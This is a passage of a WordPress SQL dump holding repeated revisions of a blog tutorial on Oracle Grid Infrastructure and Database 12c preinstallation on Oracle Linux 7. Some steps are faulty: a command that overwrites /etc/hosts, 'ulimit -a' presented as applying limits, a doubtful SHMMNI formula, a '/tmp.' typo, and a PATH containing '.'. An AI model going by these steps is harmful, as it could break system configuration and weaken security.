/wp:syntaxhighlighter/code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\npasswd oracle\npasswd grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nulimit -a \n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /home/grid/.bash_profile\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ncd /u01/crs/grid\n./gridSetup.sh\n\n<!-- /wp:syntaxhighlighter/code --> ','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 08:34:20','2020-02-02 08:34:20','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(31,2,'2020-02-02 08:36:23','2020-02-02 08:36:23','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\necho \"IP hostname hostname.domain\" > /etc/hosts\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li>\n<li>SHMMNI = PAGE_SIZE\n</li>\n</ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nfree -b\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsysctl -p\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\npasswd oracle\npasswd grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nulimit -a \n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /home/grid/.bash_profile\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ncd /u01/crs/grid\n./gridSetup.sh\n\n<!-- /wp:syntaxhighlighter/code --> ','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 08:36:23','2020-02-02 08:36:23','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(33,2,'2020-02-02 09:34:42','2020-02-02 09:34:42','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\necho \"IP hostname hostname.domain\" > /etc/hosts\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li>\n<li>SHMMNI = PAGE_SIZE\n</li>\n</ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nfree -b\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsysctl -p\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\npasswd oracle\npasswd grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nulimit -a \n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /home/grid/.bash_profile\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ncd /u01/crs/grid\n./gridSetup.sh\n\n<!-- /wp:syntaxhighlighter/code --> ','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 09:34:42','2020-02-02 09:34:42','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(34,2,'2020-02-02 09:35:20','2020-02-02 09:35:20','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\necho \"IP hostname hostname.domain\" > /etc/hosts\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li>\n<li>SHMMNI = PAGE_SIZE\n</li>\n</ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nfree -b\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsysctl -p\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\npasswd oracle\npasswd grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nulimit -a \n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you run these commands:</p>\n\n<!-- 